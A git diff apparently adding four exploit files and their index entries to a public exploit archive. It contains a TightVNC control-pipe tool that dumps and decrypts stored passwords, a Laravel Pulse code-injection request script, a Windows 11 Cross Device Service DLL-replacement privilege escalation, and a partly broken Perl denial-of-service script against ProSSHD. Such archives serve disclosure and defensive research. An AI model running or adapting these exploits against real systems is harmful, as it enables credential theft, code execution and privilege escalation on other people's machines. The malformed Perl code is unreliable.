diff --git a/exploits/multiple/local/52322.c b/exploits/multiple/local/52322.c new file mode 100644 index 000000000..2913c793d --- /dev/null +++ b/exploits/multiple/local/52322.c @@ -0,0 +1,252 @@ +# Exploit Title: TightVNC 2.8.83 - Control Pipe Manipulation +# Date: 06/09/2025 +# Exploit Author: Ionut Zevedei (mail@izvd.eu) +# Exploit Repository: https://github.com/zeved/CVE-2024-42049-PoC +# Vendor Homepage: https://www.tightvnc.com/ +# Software Link: https://www.tightvnc.com/download.php +# Version: 2.8.83 +# Tested on: Windows 10 x64 - TightVNC 2.5.10, 2.8.81 +# CVE : CVE-2024-42049 + +#include =20 +#include +#include +#include +#include "descrypt.h" + +#define GETBYTE(x, n) (((x) >> ((n) * 8)) & 0xFF) +#define BUFFER_SIZE 512 + +#define TVNC_CMD_DISCONNECT_ALL_CLIENTS 0x06 +#define TVNC_CMD_GET_CLIENT_LIST 0x04 +#define TVNC_CMD_SHUTDOWN_SERVER 0x07 +#define TVNC_CMD_GET_SERVER_INFO 0x11 +#define TVNC_CMD_GET_CONFIG 0x12 + +const unsigned int commands[6] =3D { + TVNC_CMD_DISCONNECT_ALL_CLIENTS, + TVNC_CMD_GET_CLIENT_LIST, + TVNC_CMD_SHUTDOWN_SERVER, + TVNC_CMD_GET_SERVER_INFO, + TVNC_CMD_GET_CONFIG, +}; + +unsigned char des_key[8] =3D { 23, 82, 107, 6, 35, 78, 88, 7 }; + +void get_bytes(unsigned int data, unsigned char* out) { + out[0] =3D GETBYTE(data, 3); + out[1] =3D GETBYTE(data, 2); + out[2] =3D GETBYTE(data, 1); + out[3] =3D GETBYTE(data, 0); +} + +// printf is wonky when printing passwords later +void print_passwd(unsigned char* passwd) { + for (int i =3D 0; i < 8; i++) { + printf("%c", passwd[i]); + } + printf("\n"); +} + +void print_error(unsigned long error_code) { + unsigned char* buffer; + =20 + // damn it windows... + FormatMessage( + FORMAT_MESSAGE_ALLOCATE_BUFFER | + FORMAT_MESSAGE_FROM_SYSTEM | + FORMAT_MESSAGE_IGNORE_INSERTS, + NULL, + error_code, + MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), + (LPTSTR) &buffer, + 0, NULL); + + printf("[error]: %s\n", buffer); +} + +void decrypt_passwords(unsigned char *buffer_ptr, unsigned int offset) { + unsigned char primary_passwd[8] =3D { 0x00 }; + unsigned char view_only_passwd[8] =3D { 0x00 }; + + printf("\n\tencrypted primary password: "); + for (int i =3D 0; i < 8; i++) { + primary_passwd[i] =3D buffer_ptr[offset + 8 + i]; + printf("%02x ", primary_passwd[i]); + } + printf("\n\tencrypted view-only password: "); + for (int i =3D 0; i < 8; i++) { + view_only_passwd[i] =3D buffer_ptr[offset + i]; + printf("%02x ", view_only_passwd[i]); + } + + + unsigned char primary_passwd_decrypted[8] =3D { 0x00 }; + unsigned char view_only_passwd_decrypted[8] =3D { 0x00 }; + + decrypt(primary_passwd_decrypted, view_only_passwd, + sizeof(primary_passwd_decrypted), des_key); + decrypt(view_only_passwd_decrypted, primary_passwd, + sizeof(view_only_passwd_decrypted), des_key); + + printf("\n\tdecrypted primary password: "); + print_passwd(primary_passwd_decrypted); + printf("\tdecrypted view-only password: "); + print_passwd(view_only_passwd_decrypted); +} + +BOOL open_pipe(PHANDLE handle_ptr, char *pipe_name) { + unsigned long pipe_mode; + BOOL result =3D FALSE; + printf("[~] opening pipe %s...\n", pipe_name); + + while (1) { + *handle_ptr =3D CreateFile( + pipe_name, + GENERIC_READ | GENERIC_WRITE, + 0, + NULL, + OPEN_EXISTING, + FILE_FLAG_OVERLAPPED, + NULL + ); + + if (*handle_ptr !=3D INVALID_HANDLE_VALUE) { + printf("[+] pipe opened\n"); + break; + } + + if (GetLastError() !=3D ERROR_PIPE_BUSY) { + printf("[-] could not open pipe\n"); + print_error(GetLastError()); + return FALSE; + } + + printf("[~] waiting for named pipe to be available - if this hangs the = +pipe server might be dead.\n"); + + WaitNamedPipe(pipe_name, NMPWAIT_WAIT_FOREVER); + } + + pipe_mode =3D PIPE_READMODE_BYTE; + result =3D SetNamedPipeHandleState(*handle_ptr, &pipe_mode, NULL, NULL); + + if (!result) { + printf("[-] failed setting pipe read mode\n"); + print_error(GetLastError()); + return result; + } + + return result; +} + +int main(int argc, char* argv[]) { + + HANDLE pipe_handle =3D NULL; + unsigned char message[8] =3D { 0x00 }; + unsigned char buffer[BUFFER_SIZE] =3D { 0x00 }; + BOOL result =3D FALSE; + unsigned long bytes_read, bytes_written; + unsigned int cmd_index =3D 0; + unsigned int offset =3D 30; + + if (argc < 3) { + printf("usage: %s \n", argv[0]); + printf("offset - optional: default is 30 - change as needed\n"); + printf("commands:\n"); + printf("\t1 - disconnect all clients\n"); + printf("\t2 - get client list\n"); + printf("\t3 - shutdown server\n"); + printf("\t4 - get server info\n"); + printf("\t5 - get server config\n"); + printf("example pipes:\n\t\\\\192.168.1.42\\pipe\\TightVNC_Service_Cont= +rol\n"); + printf("\t\\\\.\\pipe\\TightVNC_Application_Control_On_Session1\n\n"); + return 0; + } + + char* stop =3D NULL; + cmd_index =3D strtol(argv[1], &stop, 10); + + if (stop =3D=3D '\0') { + return 0; + } + + cmd_index--; + + if (argc =3D=3D 4) { + stop =3D NULL; + offset =3D strtol(argv[3], &stop, 10); + + if (offset =3D=3D 0 || stop =3D=3D '\0') { + return 0; + } + } + + if (!open_pipe(&pipe_handle, argv[2])) { + goto exit; + } + + printf("[i] sending command...\n"); + =20 + get_bytes(commands[cmd_index], message); + result =3D WriteFile(pipe_handle, message, 8, &bytes_written, NULL); + + if (!result) { + printf("[-] failed writing to pipe\n"); + print_error(GetLastError()); + goto exit; + } + + printf("[~] message sent; waiting for reply\n"); + + do { + result =3D ReadFile( + pipe_handle, + buffer, + BUFFER_SIZE * sizeof(unsigned char), + &bytes_read, + NULL + ); + + if (!result && GetLastError() !=3D ERROR_MORE_DATA) + break; + + printf("[+] got %d bytes back!\n", bytes_read); + printf(" hex: \n\t"); + + for (int i =3D 0; i < bytes_read; i++) { + printf("%02x ", buffer[i]); + } + + printf("\n char: \n\t"); + for (int i =3D 0; i < bytes_read; i++) { + printf("%c", buffer[i]); + } + printf("\n\n"); + + if (cmd_index =3D=3D 4) { + printf("\n[~] command is get config, attempting to decrypt passwords = +using offset %d...\n", offset); + decrypt_passwords(&buffer, offset); + } + + memset(buffer, 0, BUFFER_SIZE); + } while (!result); + + if (!result) + { + printf("[-] failed reading from pipe\n"); + print_error(GetLastError()); + goto exit; + } + + printf("\n[+] done\n\n"); + +exit: + if (pipe_handle !=3D NULL) { + CloseHandle(&pipe_handle); + } + + return 0; +} \ No newline at end of file diff --git a/exploits/php/webapps/52319.py b/exploits/php/webapps/52319.py new file mode 100755 index 000000000..5796252fa --- /dev/null +++ b/exploits/php/webapps/52319.py @@ -0,0 +1,127 @@ +#!/usr/bin/env python3 +# Exploit Title: Laravel Pulse 1.3.1 - Arbitrary Code Injection +# Author: Mohammed Idrees Banyamer (@banyamer_security) +# GitHub: https://github.com/mbanyamer +# Date: 2025-06-06 +# Tested on: Laravel Pulse v1.2.0 / Ubuntu 22.04 / Apache2 +# CVE: CVE-2024-55661 +# Type: Remote Code Execution (via Arbitrary Code Injection) +# Platform: PHP (Laravel Livewire) +# Author Country: Jordan +# Description: +# A vulnerability in Laravel Pulse (< 1.3.1) allows arbitrary code injection via +# the `remember()` method in the `RemembersQueries` trait. The attacker can craft +# a Livewire request to invoke arbitrary callables, enabling data exfiltration or +# remote execution if unsafe classes are exposed. + +""" +Laravel Pulse < 1.3.1 - Arbitrary Code Injection Exploit (CVE-2024-55661) +Author: Mohammed Idrees Banyamer | PoC + +This tool exploits the vulnerability in the `remember()` method in vulnerable versions +of laravel/pulse to trigger arbitrary code execution or sensitive data leakage via Livewire. +""" + +import argparse +import requests +import json +import sys +from rich import print +from rich.console import Console + +console = Console() + +class LaravelPulseExploit: + def __init__(self, url, component, method, csrf=None, key='exploit', component_id='abcde'): + self.url = url.rstrip('/') + self.component = component + self.method = method + self.csrf = csrf + self.key = key + self.component_id = component_id + self.headers = { + "Content-Type": "application/json", + "X-Livewire": "true", + "Accept": "application/json" + } + + if csrf: + self.headers["X-CSRF-TOKEN"] = csrf + + def build_payload(self): + return { + "type": "callMethod", + "method": "remember", + "params": [self.method, self.key], + "id": self.component_id, + "name": self.component + } + + def send(self): + full_url = f"{self.url}/livewire/message/{self.component}" + payload = self.build_payload() + + console.print(f"[bold cyan][*] Sending exploit to:[/bold cyan] {full_url}") + try: + response = requests.post(full_url, headers=self.headers, json=payload, timeout=10) + except requests.exceptions.RequestException as e: + console.print(f"[bold red][-] Request failed:[/bold red] {str(e)}") + sys.exit(1) + + self.display_response(response) + + def display_response(self, response): + console.print(f"\n[bold green][+] Status Code:[/bold green] {response.status_code}") + if response.status_code == 200: + try: + data = response.json() + pretty_data = json.dumps(data, indent=4, ensure_ascii=False) + console.print(f"[bold yellow]\n[+] Response JSON:[/bold yellow]\n{pretty_data}") + except json.JSONDecodeError: + console.print(f"[bold red][-] Failed to decode JSON:[/bold red]\n{response.text}") + else: + console.print(f"[bold red][-] Unexpected response:[/bold red] {response.text}") + + +def parse_arguments(): + parser = argparse.ArgumentParser( + description="Exploit Laravel Pulse (<1.3.1) Arbitrary Code Injection (CVE-2024-55661)" + ) + parser.add_argument("-u", "--url", required=True, help="Base URL of the Laravel app (e.g. http://example.com)") + parser.add_argument("-c", "--component", required=True, help="Livewire component name (e.g. ConfigComponent)") + parser.add_argument("-m", "--method", required=True, help="Static method to call (e.g. \\Illuminate\\Support\\Facades\\Config::all)") + parser.add_argument("-k", "--key", default="exploit", help="Cache key (default: exploit)") + parser.add_argument("--csrf", help="Optional CSRF token header") + parser.add_argument("--id", default="abcde", help="Component ID (default: abcde)") + return parser.parse_args() + + +def banner(): + console.print(""" +[bold red] + ____ _ +| __ ) __ _ _ __ _ _ / \ _ __ ___ ___ _ __ +| _ \ / _` | '_ \| | | | / _ \ | '_ ` _ \ / _ \ '__| +| |_) | (_| | | | | |_| |/ ___ \| | | | | | __/ | +|____/ \__,_|_| |_|\__, /_/ \_\_| |_| |_|\___|_| + |___/ +[/bold red] + [bold white]Laravel Pulse < 1.3.1 Arbitrary Code Injection (CVE-2024-55661)[/bold white] + [blue]Author:[/blue] Mohammed Idrees Banyamer | [green]Poc[/green] + """) + + +if __name__ == "__main__": + banner() + args = parse_arguments() + + exploit = LaravelPulseExploit( + url=args.url, + component=args.component, + method=args.method, + csrf=args.csrf, + key=args.key, + component_id=args.id + ) + + exploit.send() \ No newline at end of file diff --git a/exploits/windows/local/52320.py b/exploits/windows/local/52320.py new file mode 100755 index 000000000..5047a103a --- /dev/null +++ b/exploits/windows/local/52320.py @@ -0,0 +1,160 @@ +#!/usr/bin/env python3 +# Exploit Title: Microsoft Windows 11 Version 24H2 Cross Device Service - Elevation of Privilege +# Author: Mohammed Idrees Banyamer +# Instagram: @banyamer_security +# GitHub: https://github.com/mbanyamer +# Date: 2025-06-06 +# Tested on: Windows 11 Version 24H2 for x64-based Systems (10.0.26100.3476) +# CVE: CVE-2025-24076 +# +# Affected Versions: +# - Windows 11 Version 24H2 (x64 and ARM64) +# - Windows 11 Version 23H2 (x64 and ARM64) +# - Windows 11 Version 22H2 (x64 and ARM64) +# - Windows Server 2025 +# - Windows Server 2022 23H2 (Server Core installation) +# +# Type: Elevation of Privilege +# Platform: Microsoft Windows +# Author Country: Jordan +# CVSS v3.1 Score: 7.3 (Important) +# Weakness: CWE-284: Improper Access Control +# Attack Vector: Local +# Privileges Required: Low +# User Interaction: Required +# Scope: Unchanged +# Confidentiality, Integrity, Availability Impact: High +# Exploit Code Maturity: Unproven +# Remediation Level: Official Fix +# Description: +# This vulnerability affects Microsoft Windows 11 (various versions including 24H2, 23H2, and 22H2) +# and Windows Server 2025. It targets improper access control in the Windows Cross Device Service, +# allowing a low-privileged local attacker to overwrite a critical DLL file (CrossDevice.Streaming.Source.dll) +# in a writable directory. After triggering user interaction by opening Windows "Mobile devices" Settings, +# the attacker can replace the DLL with a malicious version, leading to SYSTEM privilege escalation. +# +# Steps of exploitation: +# 1. Verify the presence of the vulnerable DLL in the writable directory. +# 2. Build a malicious DLL that executes code with SYSTEM privileges upon loading. +# 3. Backup the original DLL to allow recovery. +# 4. Trigger the DLL load by instructing the user to open the "Mobile devices" Settings page. +# 5. Wait until the DLL is unlocked and replace it with the malicious DLL. +# 6. Achieve SYSTEM privileges when the system loads the malicious DLL. +# +# This exploit requires low privileges and user interaction but has low attack complexity +# and results in high impact due to full privilege escalation. +# + + + +import os +import shutil +import time +from pathlib import Path +import subprocess + +# Target DLL name based on vulnerability research +DLL_NAME = "CrossDevice.Streaming.Source.dll" +TARGET_PATH = Path("C:/ProgramData/CrossDevice") +MALICIOUS_DLL = Path("malicious.dll") +BACKUP_ORIGINAL_DLL = Path("original_backup.dll") + +# C source code for malicious DLL +MALICIOUS_C_CODE = r''' +#include +#include + +BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { + if (fdwReason == DLL_PROCESS_ATTACH) { + FILE *file = fopen("C:\\poc_only_admin_can_write_to_c.txt", "w"); + if (file) { + fputs("Exploit succeeded! You have SYSTEM privileges.\n", file); + fclose(file); + } + } + return TRUE; +} +''' + +def build_malicious_dll(): + print("[*] Building malicious DLL from C source...") + c_file = Path("malicious.c") + # Write C source code to file + with open(c_file, "w") as f: + f.write(MALICIOUS_C_CODE) + # Compile DLL using gcc (MinGW) + compile_cmd = [ + "gcc", "-shared", "-o", str(MALICIOUS_DLL), str(c_file), + "-Wl,--subsystem,windows" + ] + try: + subprocess.run(compile_cmd, check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + print(f"[+] Malicious DLL built successfully: {MALICIOUS_DLL}") + # Clean up C source file + c_file.unlink() + return True + except subprocess.CalledProcessError as e: + print("[!] Failed to build malicious DLL.") + print("gcc output:", e.stderr.decode()) + return False + +def is_vulnerable(): + if not TARGET_PATH.exists(): + print("[!] Target directory not found.") + return False + dll_path = TARGET_PATH / DLL_NAME + if not dll_path.exists(): + print("[!] Target DLL not found.") + return False + print("[+] System appears vulnerable, DLL found in a writable path.") + return True + +def backup_original(): + dll_path = TARGET_PATH / DLL_NAME + backup_path = TARGET_PATH / BACKUP_ORIGINAL_DLL + shutil.copyfile(dll_path, backup_path) + print(f"[+] Backup created at: {backup_path}") + +def replace_with_malicious(): + dll_path = TARGET_PATH / DLL_NAME + try: + shutil.copyfile(MALICIOUS_DLL, dll_path) + print("[+] Successfully replaced the DLL with malicious version.") + return True + except PermissionError: + print("[!] Cannot write to DLL. Make sure the process using it is stopped.") + return False + +def monitor_and_replace(): + dll_path = TARGET_PATH / DLL_NAME + print("[*] Monitoring DLL until it is unlocked...") + while True: + try: + with open(dll_path, 'rb+') as f: + print("[+] File is unlocked. Attempting replacement...") + time.sleep(0.5) + return replace_with_malicious() + except PermissionError: + time.sleep(0.5) + +def trigger_com(): + print("[*] To trigger DLL load, please open Windows Settings -> Mobile devices") + input("[*] After opening Settings, press Enter to continue...") + +def main(): + if not build_malicious_dll(): + return + if not is_vulnerable(): + return + + backup_original() + trigger_com() + + success = monitor_and_replace() + if success: + print("[✓] Exploit completed successfully. Check results (e.g., C:\\poc_only_admin_can_write_to_c.txt).") + else: + print("[✗] Exploit failed.") + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/windows/remote/52321.NA b/exploits/windows/remote/52321.NA new file mode 100644 index 000000000..694d12145 --- /dev/null +++ b/exploits/windows/remote/52321.NA @@ -0,0 +1,68 @@ +# Exploit Title: ProSSHD 1.2 20090726 - Denial of Service (DoS) +# Google Dork: N/A +# Date: 13 january 2024 +# Exploit Author: Fernando Mengali +# Vendor Homepage: https://prosshd.com/ +# Software Link: N/A +# Version: 1.2 20090726 +# Tested on: Windows XP +# CVE: CVE-2024-0725 + + $sis="$^O"; + + if ($sis eq "windows"){ + $cmd="cls"; + } else {s + $cmd="clear"; + } + + system("$cmd"); + + intro(); + main(); + +print "\t ==> Connecting to webserver... \n\n"; +sleep(1); + +my $i=0; + print "\t ==> Exploiting... \n\n"; + +my $payload = "\x41" x 500; + +$connection2 = Net::SSH2->new(); +$connection2->connect($host, $port) || die "\nError: Connection Refused!\n"; +$connection2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n"; +$scpget = $connection2->scp_get($payload); +$connection2->disconnect(); + +print "\t ==> Done! Exploited!"; + sub intro { + print q { + + ,--, + _ ___/ /\| + ,;'( )__, ) ~ + // // '--; + ' \ | ^ + ^ ^ + + [+] ProSSHD 1.2 20090726 - Denial of Service (DoS) + + [*] Coded by Fernando Mengali + + [@] e-mail: fernando.mengalli@gmail.com + + } + } + + sub main { + +our ($ip, $port, $username, $password) = @ARGV; + + unless (defined($ip) && defined($port)) { + + print "\n\tUsage: $0 \n"; + exit(-1); + + } + } \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index efa451980..8f25a4a54 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10589,6 +10589,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 22732,exploits/multiple/local/22732.java,"Sun JRE/SDK 1.x - Untrusted Applet Java Security Model Violation",2003-06-05,"Marc Schoenefeld",local,multiple,,2003-06-05,2012-11-15,1,CVE-2003-1123;OSVDB-15151,,,,,https://www.securityfocus.com/bid/7824/info 9973,exploits/multiple/local/9973.sh,"Sun VirtualBox 3.0.6 - Local Privilege Escalation",2009-10-17,prdelka,local,multiple,,2009-10-16,,1,CVE-2009-3692,,,,, 49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Tess Sluyter",local,multiple,,2020-12-09,2020-12-09,0,,,,,, +52322,exploits/multiple/local/52322.c,"TightVNC 2.8.83 - Control Pipe Manipulation",2025-06-09,"Ionut Zevedei",local,multiple,,2025-06-09,2025-06-09,0,CVE-2024-42049,,,,, 52292,exploits/multiple/local/52292.c,"TP-Link VN020 F3v(T) TT_V6.2.1021) - DHCP Stack Buffer Overflow",2025-05-13,"Mohamed Maatallah",local,multiple,,2025-05-13,2025-05-13,0,CVE-2024-11237,,,,, 19551,exploits/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (1)",1997-02-13,"Last Stage of Delirium",local,multiple,,1997-02-13,2012-07-03,1,CVE-1999-0041;OSVDB-1109,,,,,https://www.securityfocus.com/bid/711/info 19552,exploits/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (2)",1997-02-13,"Solar Designer",local,multiple,,1997-02-13,2012-07-03,1,CVE-1999-0041;OSVDB-1109,,,,,https://www.securityfocus.com/bid/711/info @@ -22710,6 +22711,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 52000,exploits/php/webapps/52000.txt,"Laravel Framework 11 - Credential Leakage",2024-04-21,"Huseein Amer",webapps,php,,2024-04-21,2024-04-21,0,CVE-2024-29291,,,,, 44343,exploits/php/webapps/44343.py,"Laravel Log Viewer < 0.13.0 - Local File Download",2018-03-26,"Haboob Team",webapps,php,,2018-03-26,2018-03-26,0,CVE-2018-8947,,,,, 49198,exploits/php/webapps/49198.txt,"Laravel Nova 3.7.0 - 'range' DoS",2020-12-04,iqzer0,webapps,php,,2020-12-04,2020-12-04,0,,,,,, +52319,exploits/php/webapps/52319.py,"Laravel Pulse 1.3.1 - Arbitrary Code Injection",2025-06-09,"Mohammed Idrees Banyamer",webapps,php,,2025-06-09,2025-06-09,0,CVE-2024-55661,,,,, 5886,exploits/php/webapps/5886.pl,"LaserNet CMS 1.5 - Arbitrary File Upload",2008-06-21,t0pP8uZz,webapps,php,,2008-06-20,,1,,,,,, 5454,exploits/php/webapps/5454.txt,"LaserNet CMS 1.5 - SQL Injection",2008-04-15,cO2,webapps,php,,2008-04-14,2017-03-30,1,OSVDB-44401;CVE-2008-1913,,,,, 33947,exploits/php/webapps/33947.txt,"Last Wizardz - 'id' SQL Injection",2010-01-31,"Sec Attack Team",webapps,php,,2010-01-31,2014-07-02,1,,,,,,https://www.securityfocus.com/bid/39968/info @@ -41308,6 +41310,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 52275,exploits/windows/local/52275.c,"Microsoft Windows 11 - Kernel Privilege Escalation",2025-04-22,"Milad karimi",local,windows,,2025-04-22,2025-04-22,0,CVE-2024-21338,,,,, 52270,exploits/windows/local/52270.c,"Microsoft Windows 11 23h2 - CLFS.sys Elevation of Privilege",2025-04-22,"Milad karimi",local,windows,,2025-04-22,2025-04-22,0,CVE-2024-49138,,,,, 52284,exploits/windows/local/52284.C++,"Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation",2025-05-09,"Milad karimi",local,windows,,2025-05-09,2025-05-09,0,CVE-2024-38193,,,,, +52320,exploits/windows/local/52320.py,"Microsoft Windows 11 Version 24H2 Cross Device Service - Elevation of Privilege",2025-06-09,"Mohammed Idrees Banyamer",local,windows,,2025-06-09,2025-06-09,0,CVE-2025-24076,,,,, 40219,exploits/windows/local/40219.txt,"Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",local,windows,,2016-08-08,2016-08-08,1,CVE-2016-3223;MS16-072,,,,, 14733,exploits/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll wab.exe' DLL Hijacking",2010-08-24,TheLeader,local,windows,,2010-08-25,2010-08-25,0,CVE-2010-3147;OSVDB-67553;CVE-2010-3143;OSVDB-67499,,,,, 39788,exploits/windows/local/39788.txt,"Microsoft Windows 7 - 'WebDAV' Local Privilege Escalation (MS16-016) (2)",2016-05-09,hex0r,local,windows,,2016-05-09,2016-10-10,1,CVE-2016-0051;MS16-016,,,http://www.exploit-db.com/screenshots/idlt40000/eop2.png,, @@ -45269,6 +45272,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 34943,exploits/windows/remote/34943.txt,"Project Jug 1.0.0 - Directory Traversal",2010-11-01,"John Leitch",remote,windows,,2010-11-01,2014-10-12,1,,,,,,https://www.securityfocus.com/bid/44569/info 36235,exploits/windows/remote/36235.txt,"PROMOTIC 8.1.3 - Multiple Vulnerabilities",2011-10-14,"Luigi Auriemma",remote,windows,,2011-10-14,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/50133/info 12495,exploits/windows/remote/12495.pl,"ProSSHD 1.2 - (Authenticated) Remote (ASLR + DEP Bypass)",2010-05-03,"Alexey Sintsov",remote,windows,,2010-05-02,,1,,,,,http://www.exploit-db.comsshdlabp.exe, +52321,exploits/windows/remote/52321.NA,"ProSSHD 1.2 20090726 - Denial of Service (DoS)",2025-06-09,"Fernando Mengali",remote,windows,,2025-06-09,2025-06-09,0,CVE-2024-0725,,,,, 11618,exploits/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Remote Buffer Overflow",2010-03-02,"S2 Crew",remote,windows,,2010-03-01,,1,,,,,http://www.exploit-db.comsshdlabp.exe, 16346,exploits/windows/remote/16346.rb,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - 'Filename' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,,2010-04-30,2016-10-27,1,CVE-2006-4948;OSVDB-29032,"Metasploit Framework (MSF)",,,http://www.exploit-db.comtftpdwin.exe, 3132,exploits/windows/remote/3132.pl,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)",2007-01-15,"Jacopo Cervini",remote,windows,69,2007-01-14,2016-10-27,1,OSVDB-29032;CVE-2006-4948,,,,http://www.exploit-db.comtftpdwin.exe,